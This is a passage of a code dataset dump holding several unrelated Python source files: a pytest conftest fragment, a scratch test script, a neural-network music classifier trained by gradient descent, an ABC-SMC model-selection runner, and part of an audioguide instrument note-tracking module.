True))\n\n invalid_dir = os.sep.join([subdir, 'examples', 'invalid']) + os.sep\n if os.path.exists(invalid_dir):\n for f in glob.glob(invalid_dir + '*.json'):\n tests_payload.append((shape_file, f, False))\n\n if set(['shapes_file', 'test_file', 'test_valid']).issubset(set(metafunc.fixturenames)):\n metafunc.parametrize('shapes_file, test_file, test_valid', tests_payload)\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"478332478","text":"import time\n\n# print('%.1f%%' % ((85 - 72) / 72.0 * 100))\n# for x in range(55296) :\n# if x % 100 == 0 :\n# print(chr(x))\n# else:\n# print(chr(x), end=\"\")\n\n# print(ord(\"a\"))\n\n# a = 101\n# if a > 10 : {\n# print(a)\n# }\n# sum1 = 0\n# for b in range(a):\n# sum1 += b\n# print(sum1)\n\n# while sum1 > 100 :\n# # print(sum1)\n# # time.sleep(1)\n# sum1 -= 1\n\nprint(bin(1 << 4))\nprint(bin(11<<4))\n\ndef my_abs(s):\n if s >= 0:\n return s, -s\n else:\n return -s, s\n\ndef npp():\n pass\n\ndef mr(a, b = 2):\n return a + b\n\ndef pf(*nums):\n sum = 0\n for i in nums:\n sum = sum + i * i\n return sum\n\n\nnnn = [1,2,3,4,5,6,7]\nprint(pf(1,2,3,9))\nprint(pf(*nnn))","sub_path":"pythonPrj/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616482292","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport csv\nimport sys\nimport math\nimport numpy as np\nimport time\nimport random\nimport time\n\nmusic_train_file = sys.argv[1]\nwith open(music_train_file) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n music_train = []\n for i in readCSV:\n music_train.append(i)\n\n# Get the original value\ni = 0\nvalue = []\nyear = []\nlength = []\njazz = []\nrock = []\nnew_value = []\nfor row in music_train:\n i +=1\n if i > 1:\n year.append(row[0])\n length.append(row[1])\n jazz.append(row[2])\n rock.append(row[3])\n value.append(row)\nmin_year = min(year)\nmax_year = max(year)\nmin_length = min(length)\nmax_length = max(length)\n\n# Do feature scaling and change \"yes\" to \"1.0\", \"no\" to \"0.0\"\nyear_new = []\nlength_new = []\njazz_new = []\nrock_new = []\nfor i in year:\n year_new.append((float(i)-float(min_year))/(float(max_year)-float(min_year)))\nfor i in length:\n length_new.append((float(i)-float(min_length))/(float(max_length)-float(min_length)))\nfor i in jazz:\n if i == \"yes\":\n jazz_new.append(1.0)\n if i == \"no\":\n jazz_new.append(0.0)\nfor i in rock:\n if i == \"yes\":\n rock_new.append(1.0)\n if i == \"no\":\n rock_new.append(0.0) \n \n# Get the new training set\ntraining = []\nfor i in range(len(year_new)):\n training.append(np.asarray([1.0, year_new[i], length_new[i], jazz_new[i], rock_new[i]]).reshape(1,-1))\ntraining_data = np.asarray(training)\n\n# Get keys\nmusic_train_key_file = sys.argv[2]\nwith open(music_train_key_file) as csvfile:\n readCSV = csv.reader(csvfile)\n music_key = []\n for i in readCSV:\n music_key.append(i)\n# Change \"yes\" to \"1.0\", \"no\" to \"0.0\"\nkey_new = []\nfor i in music_key:\n if i == ['yes']:\n key_new.append([1.0])\n if i == ['no']:\n key_new.append([0.0])\ntraining_key = np.asarray(key_new,float)\n\n# Get weights\nmusic_weight_1 = sys.argv[4]\nwith open(music_weight_1) as csvfile:\n readCSV = csv.reader(csvfile)\n input_weight1 = []\n for i in readCSV:\n input_weight1.append(i)\ninput_weight = np.asarray(input_weight1,float)\n# Get weights\nmusic_weight_2 = sys.argv[5]\nwith open(music_weight_2) as csvfile:\n readCSV = csv.reader(csvfile)\n neuron_weight1 = []\n for i in readCSV:\n neuron_weight1.append(i)\nneuron_weight = np.asarray(neuron_weight1,float)\n\ntraining1 = []\nfor i in range(len(year_new)):\n training1.append([1.0, year_new[i], length_new[i], jazz_new[i], rock_new[i]])\ntraining_data1 = np.asarray(training1)\n\nlast_loss = 13\nfor i in range(0,3054):\n # Get the hidden layer output should be 100 * 3\n hidden_layer_output = 1/(1+(np.exp(-np.dot(training_data1, input_weight)))) \n # Get hidden layer output + x0\n new_hidden_layer_output = np.insert(hidden_layer_output, 0, 1.0, axis=1)\n # Get the output\n output = 1/(1+(np.exp(-np.dot(new_hidden_layer_output, neuron_weight)))) \n # Compute loss function\n k = output - training_key\n j = k * k\n sum_j = np.sum(j)\n loss_function_1 = 1/(2) * sum_j\n if loss_function_1 < last_loss:\n print(loss_function_1)\n else:\n break\n \n # Get delta output\n delta_output = -(-k)*output*(1-output)\n delta_hidden_layer = new_hidden_layer_output * (1-new_hidden_layer_output) * delta_output * neuron_weight.T\n q = np.delete(delta_hidden_layer, 0, axis=1)\n input_weight_update = input_weight - 0.1 * np.dot(training_data1.T, q)\n hidden_layer_weight_update = neuron_weight - 0.1 * np.dot(new_hidden_layer_output.T, delta_output)\n last_loss = loss_function_1\n input_weight = input_weight_update\n neuron_weight = hidden_layer_weight_update\nget_input_weight = input_weight\nget_neuron_weight = neuron_weight\nprint('GRADIENT DESCENT TRAINING COMPLETED!')\n\n\n# In[ ]:\n\n\n# Get weights\nmusic_weight_1 = sys.argv[4]\nwith open(music_weight_1) as csvfile:\n readCSV = csv.reader(csvfile)\n input_weight1 = []\n for i in readCSV:\n input_weight1.append(i)\ninput_weight = np.asarray(input_weight1,float)\n# Get weights\nmusic_weight_2 = sys.argv[5]\nwith open(music_weight_2) as csvfile:\n readCSV = csv.reader(csvfile)\n neuron_weight1 = []\n for i in readCSV:\n neuron_weight1.append(i)\nneuron_weight = np.asarray(neuron_weight1,float)\n\ns_sum_loss = 0\nfor w in range(0,15):\n for i in range(len(training_data)):\n s_hidden_layer_output = 1/(1+(np.exp(-np.dot(training_data[i], input_weight))))\n s_new_hidden_layer_output = np.insert(s_hidden_layer_output,0,1.0).reshape(1,-1)\n s_output = 1/(1+(np.exp(-np.dot(s_new_hidden_layer_output, neuron_weight)))) \n s_k = s_output - training_key[i]\n s_j = s_k * s_k\n s_loss_function_1 = 1/(2) * s_j\n# import pdb;pdb.set_trace()\n s_sum_loss += s_loss_function_1[0][0]\n s_delta_output = -(-s_k)*s_output*(1-s_output)\n s_new_hidden_layer_output1 = s_new_hidden_layer_output.reshape(1,-1)\n s_new_hidden_layer_output1 = s_new_hidden_layer_output1.T\n s_delta_hidden_layer = s_new_hidden_layer_output * (1-s_new_hidden_layer_output) * s_delta_output * neuron_weight.T\n s_q = np.delete(s_delta_hidden_layer, 0, axis=1)\n s_input_weight_update = input_weight - 0.4 * training_data[i].T * s_q\n s_hidden_layer_weight_update = neuron_weight - 0.4 * s_new_hidden_layer_output1* s_delta_output\n input_weight = s_input_weight_update\n neuron_weight = s_hidden_layer_weight_update\n print(s_sum_loss)\n s_sum_loss = 0\nprint('STOCHASTIC GRADIENT DESCENT TRAINING COMPLETED! NOW PREDICTING.')\n\n\n# In[ ]:\n\n\n# Predicting\nmusic_dev = sys.argv[3]\nwith open(music_dev) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n music_dev = []\n for i in readCSV:\n music_dev.append(i)\n# Get the original value\ni_d = 0\nvalue_d = []\nyear_d = []\nlength_d = []\njazz_d = []\nrock_d = []\nnew_value_d = []\nfor row in music_dev:\n i_d +=1\n if i_d > 1:\n year_d.append(row[0])\n length_d.append(row[1])\n jazz_d.append(row[2])\n rock_d.append(row[3])\n value_d.append(row)\nmin_year_d = min(year_d)\nmax_year_d = max(year_d)\nmin_length_d = min(length_d)\nmax_length_d = max(length_d)\n\n# DO feature scaling and change \"yes\" to \"1.0\", \"no\" to \"0.0\"\nyear_new_d = []\nlength_new_d = []\njazz_new_d = []\nrock_new_d = []\nfor i in year_d:\n year_new_d.append((float(i)-float(min_year_d))/(float(max_year_d)-float(min_year_d)))\nfor i in length_d:\n length_new_d.append((float(i)-float(min_length_d))/(float(max_length_d)-float(min_length_d)))\nfor i in jazz_d:\n if i == \"yes\":\n jazz_new_d.append(1.0)\n if i == \"no\":\n jazz_new_d.append(0.0)\nfor i in rock_d:\n if i == \"yes\":\n rock_new_d.append(1.0)\n if i == \"no\":\n rock_new_d.append(0.0) \n \n# Get the new training set\ntraining_d = []\nfor i in range(len(year_new_d)):\n training_d.append([1.0, year_new_d[i], length_new_d[i], jazz_new_d[i], rock_new_d[i]])\ntraining_data_d = np.asarray(training_d)\nhidden_layer_output_d = 1/(1+(np.exp(-np.dot(training_data_d, get_input_weight))))\nnew_hidden_layer_output_d = np.insert(hidden_layer_output_d,0,1.0, axis=1)\noutput_d = 1/(1+(np.exp(-np.dot(new_hidden_layer_output_d, get_neuron_weight))))\nfor i in output_d:\n if i >= 0.5:\n print('yes')\n if i < 0.5:\n print('no')\n\n","sub_path":"NN_music.py","file_name":"NN_music.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36339746","text":"import algorithms\nfrom model_space import Model\nimport xml.etree.ElementTree as ET\nimport csv\nimport os\nfrom model_space import ModelSpace\nimport algorithm_utils as alg_utils\nimport numpy as np\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\nfrom operator import mul\nimport classification\nimport seaborn as sns;\n\nsns.set()\nfrom scipy.optimize import fsolve\nimport classification\n\nimport sys\nimport glob\n\nimport pandas as pd\nimport pickle\n\nimport tarfile\nimport yaml\nimport argparse\n\nfrom shutil import copy\n\n# Set time points\nparser = argparse.ArgumentParser()\nparser.add_argument('--config', type=str)\nparser.add_argument('--exp_suffix', type=int)\n\nargs = parser.parse_args()\n\nconfig_yaml_path = args.config\nexp_num = args.exp_suffix\n\nwith open(config_yaml_path, 'r') as yaml_file:\n experiment_config = yaml.load(yaml_file, Loader=yaml.FullLoader)\n experiment_config['final_epsilon'] = [float(x) for x in experiment_config['final_epsilon']]\n experiment_config['initial_epsilon'] = [float(x) for x in experiment_config['initial_epsilon']]\n\n# Unpack config file\ninput_folder = experiment_config['inputs_folder']\noutput_folder = experiment_config['output_folder']\nexperiment_name = experiment_config['experiment_name']\n\nt_0 = experiment_config['t_0']\nt_end = experiment_config['t_end']\ndt = experiment_config['dt']\nfit_species = experiment_config['fit_species']\nfinal_epsilon = experiment_config['final_epsilon']\ninitial_epsilon = experiment_config['initial_epsilon']\n\npopulation_size = experiment_config['population_size']\nn_sims_batch = experiment_config['n_sims_batch']\n\ndistance_function_mode = experiment_config['distance_function_mode']\nrun_rejection = experiment_config['run_rejection']\nrun_SMC = experiment_config['run_SMC']\n\nalpha = experiment_config['alpha']\n\nabs_tol = float(experiment_config['abs_tol'])\nrel_tol = float(experiment_config['rel_tol'])\n\n\ndef import_input_file(input_path):\n data_dict = {}\n with open(input_path) as fin:\n reader = csv.reader(fin, skipinitialspace=True)\n for row in reader:\n data_dict[row[0]] = [float(i) for i in row[1:]]\n\n return data_dict\n\n\ndef ABCSMC():\n experiment_folder = experiment_name + '_' + str(exp_num)\n exp_output_folder = output_folder + experiment_folder + '/'\n print(exp_output_folder)\n\n latest_pickle_path = alg_utils.find_latest_population_pickle(exp_output_folder)\n print(latest_pickle_path)\n ABC_algs = None\n\n try:\n os.mkdir(exp_output_folder)\n\n except FileExistsError:\n pass\n\n # Load models from input files\n model_list = []\n for i in range(int((len(os.listdir(input_folder)) / 2))):\n input_params = input_folder + \"params_\" + str(i) + \".csv\"\n input_init_species = input_folder + \"species_\" + str(i) + \".csv\"\n init_params = import_input_file(input_params)\n init_species = import_input_file(input_init_species)\n\n model_new = Model(i, init_params, init_species)\n model_list.append(model_new)\n\n # Run ABC_rejection algorithm\n ABC_algs = algorithms.ABC(t_0, t_end, dt, exp_num=exp_num, model_list=model_list, population_size=population_size,\n n_sims_batch=n_sims_batch,\n fit_species=fit_species, initial_epsilon=initial_epsilon, final_epsilon=final_epsilon,\n distance_function_mode=distance_function_mode,\n n_distances=len(final_epsilon), abs_tol=abs_tol, rel_tol=rel_tol,\n out_dir=exp_output_folder)\n\n if run_rejection == \"Y\":\n ABC_algs.current_epsilon = final_epsilon\n\n ABC_algs.run_model_selection_ABC_SMC(alpha=alpha, run_test=0)\n\n copy(config_yaml_path, exp_output_folder)\n\n alg_utils.make_tarfile(exp_output_folder[0:-1] + \"_pop_\" + str(ABC_algs.population_number) + \".tar.gz\",\n exp_output_folder)\n\n\nif __name__ == \"__main__\":\n # for i in range(50):\n # steady_state_test(i)\n # ABCSMC_run_tests()\n # exit()\n # ABCSMC_run_gerlaud_test()\n ABCSMC()\n # ABC_rejection()\n # simulate_and_plot()\n # resample_and_plot_posterior()\n # ABC_rejection()\n # eig_classification_test()\n # repressilator_test()\n # exit()\n # ABC_rejection()\n","sub_path":"ABC/run_boost_rpr.py","file_name":"run_boost_rpr.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103021265","text":"import os, sys\nimport numpy as np\nimport audioguide.util as util\n\n\n\n#########################\n## things to implement ##\n#########################\n# * enforced minimum of sounds per instrument per segment?\n# * change signal decomp to support MW - modolus of target segment times before concate?\n\n\n\n\n\n\n\n\n\n\ndef pitchoverride(cobjlist, config):\n\tpitchlist = [c.desc['MIDIPitch-seg'].get(None, None) for c in cobjlist]\n\tminpitch, maxpitch = min(pitchlist), max(pitchlist)\n\toutput_dict = {}\n\t\n\tfor c, standardpitch in zip(cobjlist, pitchlist):\n\t\tif config == None:\n\t\t\toutput_dict[c] = standardpitch\n\t\telif type(config) in [float, int]: # pitchoverride=60\n\t\t\toutput_dict[c] = config\n\t\telif type(config) != dict:\n\t\t\tutil.error(\"INSTRUMENTS\", 'pitchoverride must either be None, a number, or a dictionary.')\n\t\t# if passing this point, we're using the dict format\n\t\telif 'type' in config and config['type'] == 'remap':\n\t\t\tassert 'low' in config and 'high' in config\n\t\t\tstandard_zerotoone = (standardpitch-minpitch)/(maxpitch-minpitch)\n\t\t\toutput_dict[c] = (standard_zerotoone*(config['high']-config['low']))+config['low']\n\t\t# clip\n\t\telif 'type' in config and config['type'] == 'clip':\n\t\t\tassert 'low' in config or 'high' in config\n\t\t\tif 'low' in config and standardpitch < config['low']: output_dict[c] = config['low']\n\t\t\telif 'high' in config and standardpitch > config['high']: output_dict[c] = config['high']\n\t\t\telse: output_dict[c] = standardpitch\n\t\t# filename string match\n\t\telif 'type' in config and config['type'] == 'file_match':\n\t\t\tfor k in config:\n\t\t\t\tif k == 'type': continue\n\t\t\t\tif util.matchString(c.printName, k, caseSensative=True):\n\t\t\t\t\toutput_dict[c] = config[k]\n\t\t\t# not found\n\t\t\toutput_dict[c] = standardpitch\n\t\telse:\n\t\t\tutil.error(\"INSTRUMENTS\", 'Ya done goofed son.')\n\treturn output_dict\n\n\n\nclass notetracker:\n\t'''tracks lots of info about notes that have been picked. provides data for testing the viability of future selections.'''\n\tinstrument_num_notes = 0\n\tnoninstrument_num_notes = 0\n\tinstrdata = {}\n\t########################################\n\tdef __init__(self, hopsize):\n\t\tself.hopsize = hopsize\n\t########################################\n\tdef addinstrument(self, instr, tgtlength, instrparams, cpsids, cpsparams):\n\t\t#self.instrToIdx[instr] = len(self.instrdata)\n\t\tself.instrdata[instr] = {'instr': {}, 'tech': {}, 'cps': {}, 'cpsids': cpsids}\n\t\t# set up instrument trackers\n\t\tself.instrdata[instr]['selected_notes'] = {}\n\t\tself.instrdata[instr]['overlaps'] = np.zeros(tgtlength, dtype=int)\n\t\t# set up technique trackers\n\t\tfor d in cpsparams:\n\t\t\tif 'technique' not in d or d['technique'] in self.instrdata[instr]['tech']: continue\n\t\t\tself.instrdata[instr]['tech'][d['technique']] = np.zeros(tgtlength, dtype=int)\t\n\t\t# set up cps voice trackers\n\t\tfor vc in cpsids:\n\t\t\tself.instrdata[instr]['cps'][vc] = np.zeros(tgtlength, dtype=int)\n\t########################################\n\tdef addnote(self, instr, cpsid, time, duration, midi, db, technique):\n\t\tif time not in self.instrdata[instr]['selected_notes']: self.instrdata[instr]['selected_notes'][time] = []\n\t\tself.instrdata[instr]['selected_notes'][time].append([duration, midi, db, cpsid])\n\t\tself.instrdata[instr]['overlaps'][time:time+duration] += 1\n\t\tself.instrdata[instr]['cps'][cpsid][time:time+duration] += 1\n\t\tif technique != None:\n\t\t\tself.instrdata[instr]['tech'][technique][time:time+duration] += 1\n\t\tself.instrument_num_notes += 1\n\t########################################\n\tdef _neighbor_notetimes(self, instr, time, cpsscope=None):\n\t\t'''returns None or notetime for previous and next notes'''\n\t\tprev = None\n\t\tnext = None\n\t\tfor notetime in self.instrdata[instr]['selected_notes'].keys():\n\t\t\tif cpsscope != None and self.instrdata[instr]['selected_notes'][notetime][0][3] not in cpsscope: continue\n\t\t\tif notetime < time and (prev == None or notetime > prev): prev = notetime\n\t\t\telif notetime > time and (next == None or notetime < next): next = notetime\n\t\treturn prev, next\n\t######################################\n\t## publically callable test methods ##\n\t######################################\n\tdef test_overlap_threshold(self, instr, time, insobj):\n\t\ttests = [self.instrdata[instr]['cps'][vc][time] >= insobj[instr]['cps'][vc]['polyphony_max_voices'] for vc in self.instrdata[instr]['cps']]\n\t\treturn True in tests\n\t########################################\n\tdef test_other_voice_is_active(self, instrumentsobj, instr, time, exclude_vc):\n\t\tothervoices = [vcid for vcid in self.instrdata[instr]['cps'] if self.instrdata[instr]['cps'][vcid][time] > 0 and vcid != exclude_vc and not instrumentsobj[instr]['cps'][vcid]['canPlayWhileDoingSomethingElse']]\n\t\treturn len(othervoices) > 0\n\t########################################\n\tdef test_minspeed(self, instr, time, vc, instrumentsobj, cpsscope=None):\n\t\tprev, next = self._neighbor_notetimes(instr, time, cpsscope=cpsscope)\n\t\t# test this time for polyphony\n\t\tif time in self.instrdata[instr]['selected_notes']:\n\t\t\tminspeed_in_frames = instrumentsobj.instruments[instr]['cps'][vc]['polyphony_minspeed_frames']\n\t\telse:\n\t\t\tminspeed_in_frames = instrumentsobj.instruments[instr]['cps'][vc]['minspeed_frames']\n\t\treturn (prev == None or time-prev >= minspeed_in_frames) and (next == None or next-time >= minspeed_in_frames)\n\t########################################\n\tdef get_invalid_techniques(self, instrumentsobj, time):\n\t\tinstrumentInvalidTechniques = {}\n\t\tfor i in instrumentsobj.instruments:\n\t\t\t# test to see what techniques are invalid according to \"technique_time_constraints\"\n\t\t\tinstrumentInvalidTechniques[i] = []\n\t\t\tfor (testtech, constrainingtech), frameseek in instrumentsobj.instruments[i]['technique_time_constraints'].items():\n\t\t\t\tif frameseek < 0: testf = (max(0, time+frameseek), time)\n\t\t\t\telse: testf = (time, time+frameseek)\n\t\t\t\tif constrainingtech not in self.instrdata[i]['tech']:\n\t\t\t\t\tprint(\"ERROR, %s doesn't have a technique called %s\"%(i, constrainingtech))\n\t\t\t\t\tsys.exit()\n\t\t\t\tif np.max(self.instrdata[i]['tech'][constrainingtech][testf[0]:testf[1]]) > 0:\n\t\t\t\t\tinstrumentInvalidTechniques[i].append(testtech)\n\t\treturn instrumentInvalidTechniques\n\t########################################\n\tdef get_chord_minmax(self, instr, time, vc):\n\t\tif time not in self.instrdata[instr]['selected_notes']: return None\n\t\tpitches = [p for d, p, db, vcidx in self.instrdata[instr]['selected_notes'][time] if vcidx == vc]\n\t\tdbs = [db for d, p, db, vcidx in self.instrdata[instr]['selected_notes'][time] if vcidx == vc]\n\t\tif len(pitches) == 0: return None\n\t\td = {'pitches': pitches, 'pitchmin': min(pitches), 'pitchmax': max(pitches), 'dbmin': min(dbs), 'dbmax': max(dbs)}\n\t\td['pitchrange'] = d['pitchmax']-d['pitchmin']\n\t\td['dbrange'] = d['dbmax']-d['dbmin']\n\t\treturn d\n\t########################################\n\tdef get_interval_restrictions(self, instrumentsobj, instr, vc, time):\n\t\ttests = []\n\t\tresults = []\n\t\tif len(instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames']) > 0:\n\t\t\tprev, next = self._neighbor_notetimes(instr, time)\t\n\t\t\tlast_breakpoint_frames = instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames'][-1][0] # since this list was sorted\n\t\t\tif prev != None:\n\t\t\t\t# ensure that prev is the last note's END time\n\t\t\t\tt = max(0, time - prev + max([n[0] for n in self.instrdata[instr]['selected_notes'][prev]]) )\n\t\t\t\tminp = min([n[1] for n in self.instrdata[instr]['selected_notes'][prev]])\n\t\t\t\tmaxp = max([n[1] for n in self.instrdata[instr]['selected_notes'][prev]])\n\t\t\t\ttests.append([t, minp, maxp])\n\t\t\tif next != None:\n\t\t\t\tminp = min([n[1] for n in self.instrdata[instr]['selected_notes'][next]])\n\t\t\t\tmaxp = max([n[1] for n in self.instrdata[instr]['selected_notes'][next]])\n\t\t\t\ttests.append([next-time, minp, maxp])\n\t\t\tfor tdiff, minp, maxp in tests:\n\t\t\t\tif tdiff > last_breakpoint_frames:\n\t\t\t\t\t# skip it since this time difference is greater than the last breakpoint time -- any interval is possible\n\t\t\t\t\tcontinue\n\t\t\t\tfor idx, (time, int) in enumerate(instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames'][:-1]):\n\t\t\t\t\tnextrestriction = instrumentsobj[instr]['cps'][vc]['interval_limit_breakpoints_frames'][idx+1]\n\t\t\t\t\tif tdiff >= time and tdiff < nextrestriction[0]: break\n\t\t\t\ttimeinterpolate = (tdiff-time)/(nextrestriction[0]-time)\n\t\t\t\tintervalextrapolate = (timeinterpolate*(nextrestriction[1]-int))+int\n\t\t\t\tresults.append([maxp-intervalextrapolate, minp+intervalextrapolate])\n\t\tif instrumentsobj[instr]['cps'][vc]['interval_limit_range_per_sec'] != None:\n\t\t\tmin_max_within_a_second = [[], []]\n\t\t\ttimerange = (0.5/self.hopsize)\n\t\t\tfor notetime in self.instrdata[instr]['selected_notes'].keys():\n\t\t\t\t#if cpsscope != None and self.instrdata[instr]['selected_notes'][notetime][0][3] not in cpsscope: continue\n\t\t\t\tif notetime >= time-timerange and notetime <= time+timerange:\n\t\t\t\t\td = self.get_chord_minmax(instr, notetime, vc)\n\t\t\t\t\tmin_max_within_a_second[0].append(d['pitchmin'])\n\t\t\t\t\tmin_max_within_a_second[1].append(d['pitchmax'])\n\t\t\tif len(min_max_within_a_second[0]) > 0:\n\t\t\t\tminp = min(min_max_within_a_second[0])\n\t\t\t\tmaxp = max(min_max_within_a_second[1])\n\t\t\t\textra_room = instrumentsobj[instr]['cps'][vc]['interval_limit_range_per_sec']-(maxp-minp)\n\t\t\t\tresults.append([minp-extra_room, maxp+extra_room])\n\n\t\treturn results\t\t\n\n\n\n\n\n\n################################################################################\nclass instruments:\n\tdef __init__(self, scoreFromUserOptions, usercorpus, outputfile, tgtlength, cpsseglist, hopsizesec, p):\n\t\tself.active = scoreFromUserOptions != None and len(scoreFromUserOptions.instrumentobjs) != 0\n\t\tif not self.active: return\n\t\t#\n\t\tself.outputfile = outputfile\n\t\tself.tgtlength = tgtlength\n\t\tself.tracker = notetracker(hopsizesec)\n\t\tself.hopsizesec = hopsizesec\n\t\tself.instruments = {}\n\t\tself.instrument_names = []\n\t\tself.instrumentNameToIdx = {}\n\t\tfor iidx, ins in enumerate(scoreFromUserOptions.instrumentobjs):\n\t\t\tif ins.name not in self.instrument_names: self.instrument_names.append(ins.name)\n\t\t\tk = '%i-%s'%(iidx, ins.name)\n\t\t\tself.instrumentNameToIdx[k] = iidx\n\t\t\tself.instruments[k] = {}\n\t\t\tself.instruments[k]['notes'] = {}\n\t\t\tself.instruments[k]['params'] = ins\n\t\t\tself.instruments[k]['displayname'] = ins.name\n\t\t\tself.instruments[k]['cpsTags'] = ins.params['cpsTags']\n\t\t\tself.instruments[k]['selected_pitches'] = {}\n\t\t\t# this variable holds all valid voices for this instrument\n\t\t\tself.instruments[k]['cps'] = {}\n\t\t\tcpsids = [c.voiceID for c in usercorpus if c.instrTag in self.instruments[k]['cpsTags']]\n\t\t\tcpsparams = [c.instrParams for c in usercorpus if c.instrTag in self.instruments[k]['cpsTags']]\n\t\t\tself.tracker.addinstrument(k, tgtlength, ins.params, cpsids, cpsparams)\n\t\t\tfor c in usercorpus:\n\t\t\t\tif not c.instrTag in self.instruments[k]['cpsTags']: continue\n\t\t\t\tself.instruments[k]['cps'][c.voiceID] = ins.params.copy()\n\t\t\t\t# update with instrument params if not user-supplied at corpus level\n\t\t\t\t# add values if not supplied\n\t\t\t\tvoiceparam_defaults = {'technique': None, 'notehead': None, 'annotation': None, 'articulation': None, 'canPlayWhileDoingSomethingElse': False}\n\t\t\t\tvoiceparam_defaults.update(c.instrParams)\n\t\t\t\tself.instruments[k]['cps'][c.voiceID].update(voiceparam_defaults)\n\t\t\t\t# other internal shit\n\t\t\t\tself.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints_frames'] = []\n\t\t\t\tfor time, value in self.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints']:\n\t\t\t\t\tself.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints_frames'].append((self._s2f(time), value))\n\t\t\t\tself.instruments[k]['cps'][c.voiceID]['interval_limit_breakpoints_frames'].sort()\n\t\t\t\tif self.instruments[k]['cps'][c.voiceID]['polyphony_minspeed'] == None:\n\t\t\t\t\tself.instruments[k]['cps'][c.voiceID]['polyphony_minspeed'] = self.instruments[k]['cps'][c.voiceID]['minspeed']\n\t\t\t# temporal restrictions in hop-sized frames\n\t\t\tfor voiceID in self.instruments[k]['cps']:\n\t\t\t\tself.instruments[k]['cps'][voiceID]['minspeed_frames'] = self._s2f(self.instruments[k]['cps'][voiceID]['minspeed'])\n\t\t\t\tself.instruments[k]['cps'][voiceID]['polyphony_minspeed_frames'] = self._s2f(self.instruments[k]['cps'][voiceID]['polyphony_minspeed'])\n\t\t\tself.instruments[k]['technique_time_constraints'] = {}\n\t\t\tfor idx, (constrainingtech, querytech, timesec) in enumerate(ins.params['technique_switch_delay_map']):\n\t\t\t\t#self.instruments[k]['technique_switch_delay_map'].append([querytech, constrainingtech, self._s2f(timesec)])\n\t\t\t\tself.instruments[k]['technique_time_constraints'][(querytech, constrainingtech)] = -self._s2f(timesec)\n\t\t\t\t# add cross associations\n\t\t\t\tself.instruments[k]['technique_time_constraints'][(constrainingtech, querytech)] = self._s2f(timesec)\n\t\t\t# do dynamics\n\t\t\t# make pitch/dynamics matrix\n\t\t\tfor voiceID in self.instruments[k]['cps']:\n\t\t\t\tthiscps = [c for c in cpsseglist if c.voiceID == voiceID]\n\t\t\t\t# do pitch\n\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_pitch'] = pitchoverride(thiscps, self.instruments[k]['cps'][voiceID]['pitchoverride'])\n\t\t\t\t# do equally spaced dynamics\n\t\t\t\tthiscps_powersort = sorted(thiscps, key=lambda x: x.desc['power-seg'].get(None, None))\n\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_dyn'] = {}\n\t\t\t\tif len(self.instruments[k]['cps'][voiceID]['dynamics']) == 1:\n\t\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_dyn'] = {c: self.instruments[k]['cps'][voiceID]['dynamics'][0] for c in thiscps}\n\t\t\t\telse:\n\t\t\t\t\tfor idx, c in enumerate(thiscps_powersort):\n\t\t\t\t\t\tdynidx = int((idx/float(len(thiscps_powersort)-1))*(len(self.instruments[k]['cps'][voiceID]['dynamics'])-0.01))\n\t\t\t\t\t\tself.instruments[k]['cps'][voiceID]['cobj_to_dyn'][c] = self.instruments[k]['cps'][voiceID]['dynamics'][dynidx]\n\n\t\tself.scoreparams = scoreFromUserOptions.params\n\t########################################\n\tdef _s2f(self, timesec):\n\t\tframe = timesec/self.hopsizesec\n\t\tintframe = int(frame)\n\t\tif frame > intframe: intframe += 1\n\t\treturn intframe\n\t########################################\n\tdef _f2s(self, timeframe):\n\t\tsec = timeframe*self.hopsizesec\n\t\treturn sec\n\t########################################\n\tdef evaluate_voices(self, targettimeinframes, validVoicesList):\n\t\tif not self.active: return\t\t\n\t\tinstrumentInvalidTechniques = self.tracker.get_invalid_techniques(self, targettimeinframes)\n\t\t######\n\t\tself.valid_instruments_per_voice = {}\n\t\tfor vc in validVoicesList:\n\t\t\tself.valid_instruments_per_voice[vc] = []\n\t\t\tfor i in self.instruments:\t\t\t\n\t\t\t\t##########################\n\t\t\t\t## test if name matches ##\n\t\t\t\t##########################\n\t\t\t\tif vc not in self.instruments[i]['cps']:\n\t\t\t\t\tcontinue\n\t\t\t\t##########################################################################\n\t\t\t\t## see if any other sounds have already been chosen for this instrument ##\n\t\t\t\t##########################################################################\n\t\t\t\tif self.tracker.test_other_voice_is_active(self.instruments, i, targettimeinframes, vc):\n\t\t\t\t\tcontinue\n\t\t\t\t###########################################################################\n\t\t\t\t## see if overlaps are at a max for any other techniques for this instru ##\n\t\t\t\t###########################################################################\n\t\t\t\tif self.tracker.test_overlap_threshold(i, targettimeinframes, self.instruments): \t\n\t\t\t\t\tcontinue\n\t\t\t\t#####################################\n\t\t\t\t## TECHNIQUE temporal restrictions ##\n\t\t\t\t#####################################\n\t\t\t\tif self.instruments[i]['cps'][vc]['technique'] in instrumentInvalidTechniques[i]:\n\t\t\t\t\tcontinue\n\t\t\t\t###################################\n\t\t\t\t## MINSPEED temporal restriction ##\n\t\t\t\t###################################\n\t\t\t\tif not self.tracker.test_minspeed(i, targettimeinframes, vc, self):\n\t\t\t\t\tcontinue\n\t\t\t\t# otherwise add it\n\t\t\t\tself.valid_instruments_per_voice[vc].append(i)\n\t########################################\n\tdef setup_corpus_tests(self, tidx):\n\t\tif not self.active: return True\n\t\t'''creates a list of boolean tests for corpus 